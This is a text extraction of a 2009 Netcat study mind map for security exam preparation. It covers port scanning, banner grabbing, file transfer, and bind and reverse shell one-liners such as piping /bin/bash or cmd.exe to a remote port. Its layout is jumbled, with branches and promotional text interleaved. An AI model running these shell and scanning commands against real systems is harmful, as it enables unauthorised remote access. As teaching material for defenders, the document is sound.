Not as good as nmap Netcat can also be used as a

simple port scanner

Handy if nothing else is available

Checks for open TCP ports on

192.168.1.12
Checks ports 1 to 100 nc -z 192.168.1.12 1-100 Port Scanning
-z does not connect just reports back if it can connect
Netcat will report back with what ports are open
Motivation and Study Techniques to help Cisco
Netcat can be used to spawn a you learn, remember, and pass your
CISSP
shell on a remote machine technical exams!
CEH
Can Bind a shell or do a Reverse Bind
More coming soon...
Prompt is pushed cmd.exe
Windows
Visit us www.mindcert.com
Most common shell to use Shells
/bin/bash
Linux shell does not push a prompt Linux

Server offers the shell to the client

A tool that can read and write to TCP Ports
Requires the server to be directly reachable
Binds the shell to a port and awaits a connection Runs as a client or server
Can upload and download files
Listens on port TCP/4444
nc -lvp 4444 -e cmd.exe Server Hackers Swiss Army Knife
Runs CMD.EXE when connected Can spawn a command shell
Bind Shell Multi platform
This is a Windows Host

Connects to the server Remote Administration Executes shell commands after connection
-c shell commands
Connects to port TCP/4444
nc -v 192.168.1.12 4444 Client
On 192.168.1.12 Program to execute after connection
-e filename
Shell is redirected on connection Used to bind Shells
Client pushes the shell to the server -b Allow broadcasts
Good when NAT is used
Server just listens -g gateway source-routing hop points

Server Displays the help file

nc -lvp 4444 -h
Listens on port TCP/444 Reverse Shell
-i secs Delay interval for the lines sent or ports scanned
Client pushes its shell

Client Keeps inbound sockets open for multiple

Connects to 192.168.1.12 on TCP/4444 nc -v 192.168.1.12 4444 -e /bin/bash connects
-k
When connection is made the shell is pushed
Listen mode
Netcat can also transfer both
NetCat -l
Accepts inbound connections
binary and text files Suppress name/port resolutions
You do this similar to a chat session but -n Have to use IP if you use this
redirect the input and output Will not use DNS resolution
This works with any filetype nc options -o Hex dump of traffic
Set the receiver to receive a file and output it

Server - Receiver -p port Specify the local port for remote connections
Listens on port TCP/4444 nc -lvp 4444 > myfile.txt
Transferring Files
Redirects output to a file called myfile.txt Randomizes the remote ports
-r
When the server is ready you can send any file
-s addr Sets the local source address
It will be received as myfile.txt on the receiver
Client - Sender
nc -v 192.168.1.34 4444 < testfile.txt -T tos set Type of Service
Sends testfile.txt to the receiver

-t Answer Telnet negotiation

You can use Netcat to listen on a port and UDP mode

accept incoming connections -u

This can provide a brief chat session Verbose

-v
vv is very verbose
Listens on port TCP/4444 nc -lvp 4444
Timeout for connections
V is for verbose Server Listening on a TCP/UDP -w secs
Port - Chat Session Zero=I/O mode
-z
Connects to 192.168.1.34 on port TCP/4444 nc -v 192.168.1.34 4444 Used for scanning
You can now type messages Client

Acts similar to a telnet client

Connects to port 21 on www.randomstorm.com nc -v www.randomstorm.com 21 Banner Grabbing

Displays the banner

Netcat.mmap - 24/12/2009 - Andrew Mason